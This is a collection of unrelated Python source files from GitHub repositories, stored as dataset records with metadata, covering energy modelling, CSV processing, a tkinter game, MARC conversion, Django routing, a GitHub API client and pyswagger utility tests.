energy_output.index.droplevel(\n [\"hydrogen\", \"flexible\", \"nonenergy\"]\n )\n\n # Save\n for output in [\n (energy_post_upstream, \"energy_post_upstream\"),\n (energy_post_addtl_eff, \"energy_post_addtl_eff\"),\n (energy_electrified, \"energy_electrified\"),\n (energy_reduced_electrified, \"energy_reduced_electrified\"),\n (energy_output, \"energy_output\"),\n (energy_percent, \"energy_percent\"),\n ]:\n output[0].columns = output[0].columns.astype(str)\n for col in output[0].select_dtypes(include=\"float64\").columns:\n output[0][col] = output[0][col].astype(\"float32\")\n output[0].groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n 
\"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n ],\n observed=True,\n ).sum(numeric_only=True).sort_index().to_parquet(\n \"podi/data/\" + output[1] + \".parquet\", compression=\"brotli\"\n )\n output[0].columns = output[0].columns.astype(int)\n\n energy_output = (\n energy_output.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n .sort_index()\n )\n\n # endregion\n\n return\n","repo_name":"Epic-Institute/positive-disruption","sub_path":"podi/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":76496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22098953722","text":"import pandas as pd\r\n\r\ndef create_HDI_date(data: str, save_to: str):\r\n df = pd.read_csv(f'{data}')\r\n # Extract the desired columns into a new dataframe\r\n new_df = df[['iso3', 'country', 'hdi_2021', 'gdi_2021', 'le_f_2021', 'le_m_2021', 'mys_f_2021', 'mys_m_2021', 'gni_pc_f_2021', 'gni_pc_m_2021', 'ineq_le_2021', 'ineq_edu_2021', 'ineq_inc_2021']]\r\n # Add a new column called 'Label' based on the 'hdi' values\r\n new_df['Label'] = pd.cut(new_df['hdi_2021'], bins=[0, 0.55, 0.7, 0.8, 1], labels=[4, 3, 2, 1])\r\n # Remove rows where the 'iso3' column starts with 'ZZ' (OPTIONAL)\r\n new_df = new_df[~new_df['iso3'].str.startswith('ZZ')]\r\n new_df.to_csv(f'{save_to}')\r\n \r\ndef append_2021_HDI_data(original_data, data_2021):\r\n df1 = pd.read_csv(f'{original_data}', index_col='Country_code')\r\n df2 = pd.read_csv(f'{data_2021}', index_col='iso3')\r\n\r\n # select the columns we want to append from df2 (Region is Optional and only used for testing)\r\n df2 = df2[['region', 'hdi_2020', 'hdi_2021']]\r\n\r\n # append the columns to df1, inserting them at position 31 and 32\r\n #df1.insert(0, 'region', df2['region'])\r\n df1.insert(31, '2020', df2['hdi_2020'])\r\n df1.insert(32, '2021', df2['hdi_2021'])\r\n\r\n df1.to_csv('merged_file.csv')\r\n \r\n","repo_name":"matthewjmccarthy/CS3205-Lab1","sub_path":"createCSV.py","file_name":"createCSV.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70728865106","text":"import sys\n\nfrom tkinter import Tk, Canvas, mainloop, ALL, Label\n\nfrom tkinter.messagebox import showinfo\n\nfrom wilderness import GameMap, Player, Game\n\nimport baselines\n\n# Game map settings\nMAP_WIDTH = 10\nMAP_HEIGTH = 10\n\n# Player\nPLAYER_VISION = 100\n\n# TK\nDEFAULT_TILE_SIZE = 30\n\nCANVAS_WIDTH = 1000\nCANVAS_HEIGTH = 1000\nCANVAS_OFFSET = 0 #int(CANVAS_WIDTH/2) - PLAYER_VISION * DEFAULT_TILE_SIZE\n\n\nclass TkGame(Game):\n\n tile_size = DEFAULT_TILE_SIZE\n\n keyboard_to_action = {\n 'w': 'up',\n 's': 'down',\n 'a': 'left',\n 'd': 'right'\n }\n\n def __init__(self, game_map, players, vision=PLAYER_VISION):\n super().__init__(game_map, players, vision)\n\n root = Tk()\n # Label(root, text=\"Red Sun\", bg=\"red\", fg=\"white\").pack()\n\n self.canvas = Canvas(root, width=CANVAS_WIDTH, height=CANVAS_HEIGTH)\n self.canvas.pack()\n\n self.input_enabled = False\n\n def evaluate(self):\n # Evaluate game state\n if self.game_map.is_player_at_exit(self.players[0]):\n self.input_enabled = False\n showinfo(\"Exit found!\", \"Player found exit after %s steps. 
\\n\\nTotal penalty = %s\" % (self.players[0].steps, self.players[0].score))\n            sys.exit()\n\n    def render(self):\n        self.canvas.delete(ALL)\n\n        for p in self.players:\n            # use this instance rather than the module-level 'game' global\n            self.show_terrain_for(p)\n\n        self.draw_markers(self.game_map.markers)\n\n        self.draw_panel()\n\n    def tk_display_around(self, xr, yr, dist):\n        terrain_matrix = self.game_map.get_terrain_around(xr, yr, dist)\n\n        self.draw_terrain_matrix(terrain_matrix)\n\n        return terrain_matrix\n\n    def show_terrain_for(self, player):\n        return self.tk_display_around(player.x, player.y, self.vision)\n\n    def draw_terrain_matrix(self, terrain_matrix):\n\n        for i in range(len(terrain_matrix)):\n            for j in range(len(terrain_matrix[i])):\n                terrain = terrain_matrix[i][j]\n\n                x1 = i * self.tile_size + CANVAS_OFFSET\n                y1 = j * self.tile_size + CANVAS_OFFSET\n\n                x2 = (i+1) * self.tile_size + CANVAS_OFFSET\n                y2 = (j+1) * self.tile_size + CANVAS_OFFSET\n\n                # x1,y1,x2,y2\n                self.canvas.create_rectangle(x1, y1, x2, y2, fill=terrain.color)\n\n    def draw_markers(self, markers):\n\n        for marker in markers:\n            x1 = marker.x * self.tile_size + CANVAS_OFFSET\n            y1 = marker.y * self.tile_size + CANVAS_OFFSET\n\n            x2 = (marker.x+1) * self.tile_size + CANVAS_OFFSET\n            y2 = (marker.y+1) * self.tile_size + CANVAS_OFFSET\n\n            # x1,y1,x2,y2\n            self.canvas.create_oval(x1, y1, x2, y2, fill=marker.color)\n\n    def draw_panel(self):\n        self.canvas.create_text(920, 100, text=\"Penalty: %s\" % self.players[0].score)\n\n    def draw_game_end_text(self):\n        self.canvas.create_text(920, 200, text=\"Exit found!\")\n\n    def draw_map(self):\n        self.draw_terrain_matrix(self.game_map._terrain)\n\n    #\n    # Event handlers\n    #\n    ################################\n    def callback_Button_1(self, event):\n        self.canvas.focus_set()\n        print(\"clicked at\", event.x, event.y)\n\n    def callback_Key(self, event):\n        print(\"Pressed char = %s\" % event.char)\n\n        action = self.keyboard_to_action.get(event.char, None)\n\n        if not action or not self.input_enabled:\n            return\n\n        # act on this game's own player rather than the module-level\n        # 'player1' global, so the handler also works outside __main__\n        self.player_action(self.players[0], action)\n\n        self.evaluate()\n\n        self.render()\n\n    def configure_inputs(self):\n        # the Tk event strings were garbled in the source; \"<Key>\" and\n        # \"<Button-1>\" are the standard bindings for these two handlers\n        self.canvas.bind(\"<Key>\", self.callback_Key)\n\n        self.canvas.bind(\"<Button-1>\", self.callback_Button_1)\n\n        self.canvas.pack()\n\n\nif __name__ == '__main__':\n\n    game_map = GameMap(MAP_WIDTH, MAP_HEIGTH)\n    player1 = Player(u'Human One', 0, 0)\n    game = TkGame(game_map, [player1], PLAYER_VISION)\n\n    # Show initial terrain\n\n    input_char = ''\n    last_cost = 0\n\n    game.configure_inputs()\n\n    game.render()\n\n    game.input_enabled = True\n\n    mainloop()\n","repo_name":"Hanserfaust/tk-ai-lab","sub_path":"tkinter_wilderness.py","file_name":"tkinter_wilderness.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"3586319925","text":"import pymarc\nimport time\n\n# MARC output must be opened in binary mode; Python 2's file() builtin is\n# replaced by open() here\nwriter = pymarc.MARCWriter(open('free_ebooks.marc', 'wb'))\nerror = open('errors.txt', 'w')\n\ncount = 0\n\nfor line in open('marc_urls.txt'):\n    try:\n        marcrec = pymarc.parse_xml_to_array(line)\n        writer.write(marcrec[0])\n    except Exception:\n        error.write(line)\n\n    count += 1\n    time.sleep(0.3)  # try to be nice to IA servers\n    if (count % 1000) == 0:\n        time.sleep(600)  # try to be nice to IA servers\n\nwriter.close()\n","repo_name":"no-reply/ol-marc","sub_path":"olmarc.py","file_name":"olmarc.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"4675952843","text":"#author: n01\n\"\"\"\nGraphical characters are the 
Unicode escape sequences used to\nprint symbols on both the Windows and Linux platforms.\n\nPersonal Note:\nI'm lucky to have started the project on a system and a terminal that could\nkeep up with my creativity. I must now try to adjust the whole thing for less fortunate\nterminals out there. Windows is a special case of love and hate, more hate than love.\n\"\"\"\nfrom sys import platform\n\nBLOCK_1 = \"\\u2591\" # ░\nBLOCK_2 = \"\\u2592\" # ▒\nBLOCK_3 = \"\\u2593\" # ▓\nBLOCK = \"\\u2588\" # █\n\nBLOCKS = [BLOCK_1, BLOCK_2, BLOCK_3, BLOCK]\n\nBULLET_BLOCK = \"\\u2589\" # ▉ ~ ▉▉▉\nCHESS_BLOCK = \" \" + \"\\u259E\"*3 + \" \" # ▞▞▞\n\nif platform == \"win32\":\n    BULLET_BLOCK = BLOCK # Windows doesn't support the character\n    CHESS_BLOCK = \" --- \" # Windows doesn't support this character either\n","repo_name":"Jac-Lazza/termiko","sub_path":"constants/graphical_characters.py","file_name":"graphical_characters.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"30136065784","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefines core functions and classes for QuEBA.\n\"\"\"\n\n__author__ = 'Hazeltek Solutions'\n__version__ = '0.1'\n\n\nfrom abc import ABCMeta, abstractmethod\n\n\n\nclass QuEBAError(Exception):\n    \"\"\"Base error class for QuEBA related errors.\"\"\"\n    pass\n\n\n#+=============================================================================+\n#| Validator Classes\n#+=============================================================================+\nclass Validator(object):\n    \"\"\"Represents the base validator for Validator objects.\"\"\"\n    __metaclass__ = ABCMeta\n    \n    def __init__(self, error_message='validation failed'):\n        self.error_message = error_message\n    \n    @abstractmethod\n    def __call__(self, value):\n        pass\n\n    def format(self, value):\n        \"\"\"Returns a formatted version of the validated value.\"\"\"\n        return value\n\n\nclass BookNumberValidator(Validator):\n    \"\"\"Validates an Accounts book number.\"\"\"\n    \n    def __init__(self, error_message='Invalid book number', format=True):\n        super(BookNumberValidator, self).__init__(error_message)\n        self._format = format\n\n    def __call__(self, value):\n        if value is None:\n            return (value, self.error_message)\n\n        book = value.replace('\\\\', '').replace('/', '').replace('-', '')\n        if len(book) != 6 or not self._isnumeric(book):\n            return (value, self.error_message)\n        \n        buCode = int(book[:2])\n        if buCode < 32 or buCode > 38:\n            return (value, self.error_message)\n        \n        if self._format:\n            return (self.format(book), None)\n        return (value, None)\n    \n    def _isnumeric(self, value):\n        # 'long' existed only in Python 2; int() covers both cases. The\n        # original 'except: False' also fell through and returned None.\n        try:\n            int(value)\n            return True\n        except (TypeError, ValueError):\n            return False\n\n    def format(self, value):\n        return \"%s/%s/%s\" % (value[:2], value[2:4], value[4:])\n\n\nclass AccountNumberValidator(BookNumberValidator):\n    \"\"\"Validates an Accounts customer account number.\"\"\"\n    \n    def __init__(self, error_message='Invalid account number', format=True):\n        super(AccountNumberValidator, self).__init__(error_message, format)\n\n    def __call__(self, value):\n        if value is None:\n            return (value, self.error_message)\n        \n        acctno = value.replace('\\\\', '').replace('/', '').replace('-', '')\n        if len(acctno) < 10 or len(acctno) > 12 or not self._isnumeric(acctno):\n            return (value, self.error_message)\n        \n        # validate book part of account number\n        result = super(AccountNumberValidator, self).__call__(acctno[:6])\n        if result[1] is not None:\n            return (value, self.error_message)\n        \n        # validate account validator 
digit, which is Y in 'xx/xx/xx/xxxY-xx',\n        # computed as the modulo-10 sum of the positionally weighted account\n        # digits, excluding 'Y-xx'\n        acct = acctno[:10]\n        acct_digit_pos_weights = [\n            int(acct[i]) * (i+1)\n            for i in range(len(acct) - 1)\n        ]\n\n        acct_vld_digit = sum(acct_digit_pos_weights) % 10\n        if acct[-1] != str(acct_vld_digit):\n            return (value, self.error_message)\n        \n        if self._format:\n            return (self.format(acctno), None)\n        return (value, None)\n    \n    def format(self, value):\n        return \"%s/%s/%s/%s%s\" % (\n            value[:2], value[2:4], value[4:6], value[6:10],\n            ('' if len(value) == 10 else '-%s' % value[10:])\n        )\n\n    ","repo_name":"hkmshb/queba-core","sub_path":"queba/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"20471517254","text":"\"\"\"asset URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))\n\"\"\"\n# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom hnf import views\n\nurlpatterns = [\n    # Visiting any page first redirects to the login page\n    url(r'^$', views.login),\n    # Log in\n    url(r'^login', views.login),\n    # Log out\n    url(r'^logout', views.logout),\n    # Search\n    url(r'^search', views.search, name='search'),\n    # Django's built-in admin site\n    url(r'^admin/', admin.site.urls),\n    # Asset listing pages\n    url(r'^asset/list/$', views.asset_list, name='asset_list'),\n    url(r'^asset/add/$', views.asset_add),\n    # NOTE: the named capture groups below were garbled in the source; 'nid'\n    # is an assumed name and must match the views' keyword argument\n    url(r'^asset/edit/(?P<nid>\\d+)/$', views.asset_edit),\n    url(r'^asset/del/(?P<nid>\\d+)/$', views.asset_del),\n    # Import assets\n    url(r'^asset/import/$', views.asset_import),\n    # Import template\n    url(r'^asset/tpl/$', views.asset_tpl),\n\n]\n","repo_name":"huningfei/asset","sub_path":"asset/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"16084713671","text":"import pip._vendor.requests as requests\nfrom cli.scripts.github.props import GitHubProperties\nfrom cli.scripts.github.exceptions import GitHubError\nimport json\nfrom typing import Iterator, Tuple\n\n# https://github.com/github/gitignore\n\n\nclass Client():\n    def __init__(self, props: GitHubProperties):\n        self.props = props\n\n    def __path(self, *paths: str) -> str:\n        return self.props.get(GitHubProperties.API_URL) + \"/\" + \"/\".join(paths)\n\n    def __auth(self) -> Tuple[str, str]:\n        return (self.props.get(GitHubProperties.USER), self.props.get(GitHubProperties.ACCESS_TOKEN))\n\n    def __headers(self, *other_headers: Tuple[str, str]) -> dict:\n        headers = {\n            'Accept': self.props.get(GitHubProperties.HEADER_ACCEPT), 'Content-Type': self.props.get(GitHubProperties.HEADER_CONTENT_TYPE)\n        }\n        for name, value in other_headers:\n            headers[name] = value\n        return headers\n\n    def __timeout(self) -> int:\n        return int(self.props.get(GitHubProperties.TIMEOUT))\n\n    def __user(self) -> str:\n        return self.props.get(GitHubProperties.USER)\n\n    def __get_body(self, response: 
requests.Response) -> dict:\n        body = {}\n        try:\n            body = response.json()\n        except ValueError:\n            # response body was empty or not valid JSON\n            pass\n        return {} if body is None else body\n\n    def __process_response(self, response: requests.Response, successful_status_code: int = 200) -> dict:\n        if not response:\n            raise GitHubError()\n        body = self.__get_body(response)\n        if response.status_code != successful_status_code:\n            if not isinstance(body, dict):\n                raise GitHubError()\n            title = body.get('error', 'Error calling GitHub API')\n            errors = [error.get('message') for error in body.get('errors', [])]\n            raise GitHubError(title=title, errors=errors)\n        else:\n            return body\n\n    def issues(self):\n        pass\n\n    def get_repositories(self, sort: str = 'full_name', direction: str = 'asc') -> Iterator[dict]:\n        next_page = self.__path('users', self.__user(), 'repos')\n        while next_page:\n            response = requests.get(\n                url=next_page, params={'sort': sort, 'direction': direction}, auth=self.__auth(), headers=self.__headers(\n                    ('User-Agent', self.__user())\n                ), timeout=self.__timeout()\n            )\n            body = self.__process_response(response)\n            for repo in body:\n                yield repo\n            next_page = response.links.get('next', {}).get('url')\n\n    def get_repositories_size(self, *args) -> int:\n        size = 0\n        for _ in self.get_repositories(*args):\n            size += 1\n        return size\n\n    def create_repository(self, name: str, description: str, is_private=True) -> dict:\n        response = requests.post(\n            url=self.__path('user', 'repos'), auth=self.__auth(), data=json.dumps({\n                'name': name, 'description': description, 'private': is_private, 'homepage': '/'.join(['https://github.com', self.__user(), name])\n            }), headers=self.__headers(), timeout=self.__timeout()\n        )\n        body = self.__process_response(response, 201)\n        # note: dotted keys such as 'owner.login' do not traverse nested dicts\n        return {\n            'id': body.get('id'), 'name': body.get('name'), 'owner': body.get('owner', {}).get('login'), 'https': body.get('html_url'), 'ssh': body.get('ssh_url')\n        }\n\n    def delete_repository(self, name: str) -> None:\n        response = requests.delete(\n            url=self.__path('repos', self.__user(), name), auth=self.__auth(), headers=self.__headers(), timeout=self.__timeout()\n        )\n        self.__process_response(response, 204)\n","repo_name":"gluo7777/MyTools","sub_path":"cli/scripts/github/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"35666014383","text":"## Standard Library\r\nimport os\r\n\r\n## Local\r\nfrom ...satlib import stderr, stdout\r\n\r\nclass SatError(Exception):\r\n    'Error'\r\n    def __init__(self, msg=None, target=None):\r\n        Exception.__init__(self, msg)\r\n        self.msg = str(msg) if msg is not None else \"\"\r\n        self.target = target\r\n\r\n    def __str__(self):\r\n        if self.target is not None and hasattr(self.target, 'lexinfo'):\r\n            return (\r\n                f\"In '{os.path.abspath(self.target.source.fname)}' at line {self.target.lineno}:\\n\"\r\n                f\"{self.target.source.lines[self.target.lineno]}\\n\"\r\n                f\"{' ' * self.target.chrpos}^\\n\"\r\n                f\"{self.__class__.__doc__}: {self.msg}\"\r\n            )\r\n        else:\r\n            return self.msg\r\n\r\nclass SatWarning(SatError):\r\n    'Warning'\r\n##\r\nclass SatIndexError(SatError):\r\n    'Index Error'\r\n\r\nclass SatCompilerError(SatError):\r\n    'Compiler Error'\r\n\r\nclass SatValueError(SatError):\r\n    'Value Error'\r\n\r\nclass SatTypeError(SatError):\r\n    'Type Error'\r\n\r\nclass SatReferenceError(SatError):\r\n    'Reference Error'\r\n\r\nclass SatParserError(SatError):\r\n    'Parser Error'\r\n\r\nclass SatLexerError(SatError):\r\n    'Lexer Error'\r\n\r\nclass 
SatSyntaxError(SatError):\r\n 'Syntax Error'\r\n\r\nclass SatExit(SatError):\r\n 'Exit'\r\n\r\n def __init__(self, code: int):\r\n self.code = code\r\n SatError.__init__(self, f'exit code {code}')\r\n","repo_name":"lucasvg/Satyrus3-FinalProject-EspTopsOTM","sub_path":"satyrus/sat/types/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19580115734","text":"from flask import jsonify\nfrom flask_restful import Resource\nfrom endpoints.verify import id_to_urls, states\nfrom utils.utils import get_time\nfrom config.status_codes import STATUS_CODES\n\n\nclass IDList(Resource):\n def get(self):\n for id in states:\n status = states[id].poll()\n if status is None:\n id_to_urls[id]['status'] = 'In progress'\n elif status == 0:\n id_to_urls[id]['status'] = 'Done'\n id_to_urls[id]['stopped_at'] = get_time()\n else:\n id_to_urls[id]['status'] = STATUS_CODES.get(status, \"Failed\")\n id_to_urls[id]['stopped_at'] = get_time()\n return jsonify(id_to_urls)\n","repo_name":"adobe/frontend-regression-validator","sub_path":"_fred-v1/fred/endpoints/get_ids.py","file_name":"get_ids.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"39076576614","text":"from pyswagger import utils, errs\nfrom .utils import is_windows, is_py2\nfrom datetime import datetime\nimport unittest\nimport functools\nimport six\nimport os\n\n\nclass SwaggerUtilsTestCase(unittest.TestCase):\n \"\"\" test iso 8601 converter \"\"\"\n\n def test_iso8601_convert_from_string(self):\n \"\"\" convert string to date/datetime \"\"\"\n self.assertEqual(utils.from_iso8601('2007-04-05'), datetime(2007, 4, 5))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30'), datetime(2007, 4, 5, 14, 30))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30Z'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T12:30-02:00'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T12:30:00-02:00'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T00:00:00'), datetime(2007, 4, 5, 0, 0, 0))\n self.assertEqual(utils.from_iso8601('2007-04-05T00:00:00Z'), datetime(2007, 4, 5, 0, 0, 0, tzinfo=utils.FixedTZ(0, 0)))\n # microsecond\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.1'), datetime(2007, 4, 5, 14, 30, 24, 100000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.11'), datetime(2007, 4, 5, 14, 30, 24, 110000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.111'), datetime(2007, 4, 5, 14, 30, 24, 111000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.1111'), datetime(2007, 4, 5, 14, 30, 24, 111100))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.11111'), datetime(2007, 4, 5, 14, 30, 24, 111110))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.111111'), datetime(2007, 4, 5, 14, 30, 24, 111111))\n self.assertEqual(utils.from_iso8601('2016-08-05T03:14:14.809Z'), datetime(2016, 8, 5, 3, 14, 14, 809000, tzinfo=utils.FixedTZ(0, 0)))\n\n def test_json_pointer(self):\n \"\"\" json pointer io function \"\"\"\n self.assertEqual(utils.jp_compose('/test'), '~1test')\n self.assertEqual(utils.jp_compose('~test'), '~0test')\n self.assertEqual(utils.jp_compose('/~test'), '~1~0test')\n 
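# Round-trip sanity check (illustrative, consistent with the asserts\n        # around it): jp_compose escapes '~' -> '~0' and '/' -> '~1' per\n        # RFC 6901, and jp_split reverses both, so composing then splitting\n        # a single token returns the original.\n        self.assertEqual(utils.jp_split(utils.jp_compose('/~test')), ['/~test'])\n        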
self.assertEqual(utils.jp_compose('a', 'b'), 'b/a')\n self.assertEqual(utils.jp_compose(''), '')\n self.assertEqual(utils.jp_compose(None, 'base'), 'base')\n\n cs = ['~test1', '/test2', 'test3']\n c = utils.jp_compose(cs, 'base')\n self.assertEqual(c, 'base/~0test1/~1test2/test3')\n self.assertEqual(utils.jp_split(c)[1:], cs)\n\n self.assertEqual(utils.jp_split('~1test'), ['/test'])\n self.assertEqual(utils.jp_split('~0test'), ['~test'])\n self.assertEqual(utils.jp_split('~1~0test'), ['/~test'])\n self.assertEqual(utils.jp_split(''), [])\n self.assertEqual(utils.jp_split(None), [])\n self.assertEqual(utils.jp_split('/~1~0test/qq/~0test/~1test/'), ['', '/~test', 'qq', '~test', '/test', ''])\n\n\n def test_derelativize_url(self):\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/durf.json'), 'https://localhost/hurf/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/./durf.json'), 'https://localhost/hurf/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/../durf.json'), 'https://localhost/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/.../durf.json'), 'https://localhost/durf.json')\n def test_scope_dict(self):\n \"\"\" ScopeDict \"\"\"\n obj = {\n 'a!b': 1,\n 'c!d!ee': 2,\n 'e!f!g': 3,\n 'a!f!g': 4,\n }\n d = utils.ScopeDict(obj)\n d.sep = '!'\n self.assertEqual(d['a!b'], 1)\n self.assertEqual(d['b'], 1)\n self.assertEqual(d['ee'], 2)\n self.assertEqual(d['a', 'b'], 1)\n self.assertEqual(d['c', 'd', 'ee'], 2)\n self.assertEqual(d['d', 'ee'], 2)\n self.assertRaises(ValueError, d.__getitem__, ('f', 'g'))\n self.assertRaises(TypeError, lambda x: d.sep)\n\n obj = {\n 'tag1!##!get': 1,\n 'tag2!##!something-get': 2,\n }\n d = utils.ScopeDict(obj)\n d.sep = '!##!'\n self.assertEqual(d['tag1', 'get'], 1)\n self.assertEqual(d['tag2', 'something-get'], 2)\n self.assertEqual(d['get'], 1)\n self.assertEqual(d['something-get'], 2)\n\n def test_dict_to_tuple(self):\n \"\"\" get_dict_as_tuple \"\"\"\n self.assertEqual(\n utils.get_dict_as_tuple({'a':'b'}),\n ('a', 'b')\n )\n\n def test_nv_tuple_list_replace(self):\n \"\"\" nv_tuple_list_replace \"\"\"\n d = [\n (1, 1),\n (2, 2),\n (3, 3)\n ]\n\n utils.nv_tuple_list_replace(d, (1, 4))\n self.assertEqual(d, [\n (1, 4),\n (2, 2),\n (3, 3)\n ])\n\n utils.nv_tuple_list_replace(d, (4, 4))\n self.assertEqual(d, [\n (1, 4),\n (2, 2),\n (3, 3),\n (4, 4)\n ])\n\n def test_import_string(self):\n \"\"\" test import_string \"\"\"\n self.assertEqual(utils.import_string('qoo_%^&%&'), None)\n self.assertNotEqual(utils.import_string('pyswagger'), None)\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_path2url_on_unix(self):\n \"\"\" test path2url \"\"\"\n self.assertEqual(utils.path2url('/opt/local/a.json'), 'file:///opt/local/a.json')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_path2url_on_windows(self):\n \"\"\" test path2url on windows \"\"\"\n self.assertEqual(utils.path2url(r'C:\\opt\\local\\a.json'), 'file:///C:/opt/local/a.json')\n\n def test_jr_split(self):\n \"\"\" test jr_split \"\"\"\n self.assertEqual(utils.jr_split(\n 'http://test.com/api/swagger.json#/definitions/s1'), (\n 'http://test.com/api/swagger.json', '#/definitions/s1'))\n self.assertEqual(utils.jr_split(\n 'http://test/com/api/'), (\n 'http://test/com/api/', '#'))\n self.assertEqual(utils.jr_split(\n '#/definitions/s1'), (\n '', '#/definitions/s1'))\n # relative path should be converted to absolute one\n 
self.assertEqual(utils.jr_split(\n 'user'), (\n utils.normalize_url('user'), '#'))\n self.assertEqual(utils.jr_split(\n '#'), (\n '', '#'))\n self.assertEqual(utils.jr_split(\n '//'), (\n '', '#'))\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_jr_split_on_unix(self):\n \"\"\" test jr_split on unix-like os \"\"\"\n self.assertEqual(utils.jr_split(\n '/user/tmp/local/ttt'), (\n 'file:///user/tmp/local/ttt', '#'))\n self.assertEqual(utils.jr_split(\n '/user/tmp/local/ttt/'), (\n 'file:///user/tmp/local/ttt', '#'))\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_jr_split_on_windows(self):\n \"\"\" test jr_split on windows \"\"\"\n target = 'file:///C:/user/tmp/local/ttt' if is_py2() else 'file:///c:/user/tmp/local/ttt'\n\n self.assertEqual(utils.jr_split(r'C:\\user\\tmp\\local\\ttt'), (target, '#'))\n self.assertEqual(utils.jr_split(\n # check here for adding backslach at the end of raw string\n # https://pythonconquerstheuniverse.wordpress.com/2008/06/04/gotcha-%E2%80%94-backslashes-in-windows-filenames/\n os.path.normpath('C:/user/tmp/local/ttt/')\n ), (target, '#'))\n\n def test_cycle_guard(self):\n c = utils.CycleGuard()\n c.update(1)\n self.assertRaises(errs.CycleDetectionError, c.update, 1)\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_normalize_url(self):\n self.assertEqual(utils.normalize_url(None), None)\n self.assertEqual(utils.normalize_url(''), '')\n self.assertEqual(utils.normalize_url('http://test.com/a/q.php?q=100'), 'http://test.com/a/q.php?q=100')\n self.assertEqual(utils.normalize_url('/tmp/local/test/'), 'file:///tmp/local/test')\n self.assertEqual(utils.normalize_url('/tmp/local/test'), 'file:///tmp/local/test')\n self.assertEqual(utils.normalize_url('/tmp/local/test in space.txt'), 'file:///tmp/local/test%20in%20space.txt')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_normalize_url_on_windows(self):\n self.assertEqual(utils.normalize_url(r'C:\\path\\to\\something'), 'file:///C:/path/to/something')\n\n def test_normalize_jr(self):\n self.assertEqual(utils.normalize_jr(None), None)\n self.assertEqual(utils.normalize_jr(None, 'http://test.com/api/swagger.json'), None)\n self.assertEqual(utils.normalize_jr('User.json', 'http://test.com/api/swagger.json'), 'http://test.com/api/User.json')\n self.assertEqual(utils.normalize_jr('definitions/User.json', 'http://test.com/api/swagger.json'), 'http://test.com/api/definitions/User.json')\n self.assertEqual(utils.normalize_jr('#/definitions/User', 'http://test.com/api/swagger.json'), 'http://test.com/api/swagger.json#/definitions/User')\n self.assertEqual(utils.normalize_jr('#/definitions/User'), '#/definitions/User')\n\n def test_get_swagger_version(self):\n self.assertEqual(utils.get_swagger_version({'swaggerVersion': '1.2'}), '1.2')\n self.assertEqual(utils.get_swagger_version({'swagger': '2.0'}), '2.0')\n self.assertEqual(utils.get_swagger_version({'qq': '20.0'}), None)\n\n def 